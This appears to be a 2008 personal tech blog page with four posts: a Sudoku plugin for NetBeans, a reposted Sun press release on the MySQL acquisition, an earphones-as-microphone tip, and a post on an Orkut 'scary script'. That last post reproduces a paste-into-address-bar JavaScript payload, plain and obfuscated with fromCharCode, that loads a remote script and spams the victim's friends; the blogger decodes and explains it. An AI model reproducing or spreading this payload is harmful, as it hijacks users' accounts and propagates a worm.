Thursday, January 31, 2008

Its not scary, its trap!!! ok.. its flooding!!!

Hi frnds,
have u got this script sent by ur frnd in ur scrapbook...

d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://coolpcstuff.googlepages.com/rodrigo.user.js';void(0)

no... ok have u got this one..

Scary Script - (Don't Worry Its Harmless)

*Copy Paste the Given Script In Address Bar And Press ENTER.
*Wait 2 Minutes.
*Enjoy The Fun.

javascript:eval(String.fromCharCode(100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 99, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 100, 46, 98, 111, 100, 121, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 99, 41, 59, 99, 46, 115, 114, 99, 61, 39, 104, 116, 116, 112, 58, 47, 47, 99, 111, 111, 108, 112, 99, 115, 116, 117, 102, 102, 46, 103, 111, 111, 103, 108, 101, 112, 97, 103, 101, 115, 46, 99, 111, 109, 47, 114, 111, 100, 114, 105, 103, 111, 46, 117, 115, 101, 114, 46, 106, 115, 39, 59, 118, 111, 105, 100, 40, 48, 41))

You Can Send This To Ur Friends And Scare Them Too.


this is the same as above..
eval() function of javascript does the following..
The eval() function evaluates a string and executes it as if it was script code.
The command syntax for the EVAL command is:
EVAL("some JavaScript string");

ok now the second thing...
String.fromCharCode just changes those integers to characters and that string is

d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://coolpcstuff.googlepages.com/rodrigo.user.js';void(0)

so this javascript is evaluated and result is you have indirectly sent scraps to all your frnd.. its just flooding orkut nothing else..

so use it carefully.. oops.. i mean dont use it..

enjoy bye

Thursday, January 24, 2008

Sudoku Plugin for Netbeans

Hi,
Today I published my first plugin to netbeans. It is a sudoku game module.
Get it here
http://plugins.netbeans.org/PluginPortal/faces/PluginDetailPage.jsp?pluginid=5357

enjoy

Thursday, January 17, 2008

SUN acquires MySQL

Sun Microsystems Announces Agreement to Acquire MySQL, Developer of the World's Most Popular Open Source Database

Sun Growth Strategy Accelerates With New Position in $15 Billion Database Market
SANTA CLARA, CA January 16, 2008 Sun Microsystems, Inc. (NASDAQ: JAVA) today announced it has entered into a definitive agreement to acquire MySQL AB, an open source icon and developer of one of the world's fastest growing open source databases for approximately $1 billion in total consideration. The acquisition accelerates Sun's position in enterprise IT to now include the $15 billion database market. Today's announcement reaffirms Sun's position as the leading provider of platforms for the Web economy and its role as the largest commercial open source contributor.

With millions of global deployments including Facebook, Google, Nokia, Baidu and China Mobile, MySQL will bring synergies to Sun that will change the landscape of the software industry by driving new adoption of MySQL's open source database in more traditional applications and enterprises. The integration with Sun will greatly extend the commercial appeal of MySQL's offerings and improve its value proposition with the addition of Sun's global services organization. MySQL will also gain new distribution through Sun's channels including its OEM relationships with Intel, IBM and Dell.

"Today's acquisition reaffirms Sun's position at the center of the global Web economy. Supporting our overall growth plan, acquiring MySQL amplifies our investments in the technologies demanded by those driving extreme growth and efficiency, from Internet media titans to the world's largest traditional enterprises," said Jonathan Schwartz, CEO and president, Sun Microsystems. "MySQL's employees and culture, along with its near ubiquity across the Web, make it an ideal fit with Sun's open approach to network innovation. And most importantly, this announcement boosts our investments into the communities at the heart of innovation on the Internet and of enterprises that rely on technology as a competitive weapon."

MySQL's open source database is widely deployed across all major operating systems, hardware vendors, geographies, industries and application types. The complementary product line-ups will extend MySQL's database reach and are expected to bring new markets for Sun's systems, virtualization, middleware and storage platforms.

"The combination of MySQL and Sun represents an enormous opportunity for users and organizations of all sizes seeking innovation, growth and choice," said Marten Mickos, CEO, MySQL. "Sun's culture and business model complements MySQL's own by sharing the same ideals that we have had since our foundation -- software freedom, online innovation and community and partner participation. We are tremendously excited to work with Sun and the millions of members of the MySQL open source ecosystem to continue to deliver the best database for powering the modern Web economy."

MySQL's open source database is the "M" in LAMP - the software platform comprised of Linux, Apache, MySQL and PHP/Perl often viewed as the foundation of the Internet. Sun is committed to enhancing and optimizing the LAMP stack on GNU/Linux and Microsoft Windows along with OpenSolaris and MAC OS X. The database from MySQL, OpenSolaris and GlassFish, together with Sun's Java platform and NetBeans communities, will create a powerful Web application platform across a wide range of customers shifting their applications to the Web.

More than 100 million copies of MySQL's high-performance open source database software have been downloaded and distributed and an additional 50,000 copies are downloaded daily. This broad penetration coupled with MySQL's strength in Web 2.0, Software as a Service (SaaS), enterprise, telecom and the OEM embedded market make it an important fit for Sun. With MySQL, Sun will have the ability to deepen its existing customer relationships and create new opportunities with companies seeking the flexibility and ease-of-use of open source systems.

Following completion of the proposed transaction, MySQL will be integrated into Sun's Software, Sales and Service organizations and the company's CEO, Marten Mickos, will be joining Sun's senior executive leadership team. In the interim, a joint team with representatives from both companies will develop integration plans that build upon the technical, product and cultural synergies and the best business and product development practices of both companies. MySQL is headquartered in Cupertino, CA and Uppsala, Sweden and has 400 employees in 25 countries.

As part of the transaction, Sun will pay approximately $800 million in cash in exchange for all MySQL stock and assume approximately $200 million in options. The transaction is expected to close in late Q3 or early Q4 of Sun's fiscal 2008. Completion of the transaction is subject to regulatory approval and other customary closing conditions. The deal is expected to be accretive to FY10 operating income on a GAAP basis.

The management teams of both companies will host a media and analyst conference call today at 10:00 am EST, 7:00 am PST. The call can be accessed at http://www.sun.com/investors. For those unable to listen to the live conference call, a telephone replay will be available for one week following the call by dialing (888) 566-0103 or outside of the U.S. by dialing (402) 998-0958. No passcode is required to access the replay.

About MySQL

MySQL AB develops and supports a family of high-performance, affordable database products. The company's flagship offering is 'MySQL Enterprise', a comprehensive set of production-tested software, proactive monitoring tools, and premium support services. MySQL is the world's most popular open source database software. Many of the world's largest and fastest-growing organizations use MySQL to save time and money powering their high-volume Web sites, business-critical systems and packaged software -- including industry leaders such as Yahoo!, Alcatel-Lucent, Google, Nokia, YouTube and Booking.com. With headquarters in the United States and Sweden -- and operations around the world -- MySQL AB supports both open source values and corporate customers' needs. For more information about MySQL, please visit www.mysql.com.
About Sun Microsystems, Inc.

Sun Microsystems develops the technologies that power the global marketplace. Guided by a singular vision -- "The Network is the Computer" -- Sun drives network participation through shared innovation, community development and open source leadership. Sun can be found in more than 100 countries and on the Web at http://sun.com.

MySQL and the MySQL logo are registered trademarks of MySBL AB in the United States, the European Union and other countries.

Sun, Sun Microsystems, the Sun logo, OpenSolaris, GlassFish, Java, Netbeans and The Network is the Computer are registered trademarks of Sun Microsystems in the United States and other countries.

Source : http://www.sun.com/aboutsun/pr/2008-01/sunflash.20080116.1.xml

Wednesday, January 16, 2008

Its amazing, Use earphones as mic..

Browsing through a technical blog,I came across an interesting piece of info:a pair of earphones can be used as a crude microphone.Naturally,I was tempted to criticise the author;earphones are supposed to be output devices-they're not meant for input! Nevertheless,I went on to give it a try.The author was indeed correct,they can be used as a mic,though far from the true sense of the word.Don't expect the makeshift mic to have the efficiency of that of one in a recording studio.There is not much difference between the circuits of a Microphone and a Headphone , just the headphone is designed to spread voice and an microphone to capture the voice !It works on Magnetic Reversal Property which converts vibrations into electronic signals . I have tried this on yahoo chat and it works .

So if you connect the headphone in the microphone slot of your computer, you could use it as a microphone.
Just speak in the ear buds of the microphone, but please speak a bit loudly to be audible at the other end !

Notice, that it will be likely that only one of the two earphones will be a capable carrier of the your voice, for a number of technical reasons.

To find out if your headset works as a mike and to check which ones of the two earphones is the one to talk into perform a simple test while connected online with a friend through Skype or other voice-enabled application.

Talk into one of the earphones saying "ear one, ear one ...." and do the same in the other one saying something like "ear two, ear teo, ...". Ask now your friend when she could hear you better and in most cases you will find out that the right ear is the on that does the job right.


Far from being a professional microphone replacement, this solution is good enough for any emergency situation in which you suddenly do not have access to a needed microphone, while you have available a spare traditional headset / earphones set.

Source : http://maverickshaunt.blogspot.com/2008/01/mic-i-use-in-my-pca-pair-of-earphones.html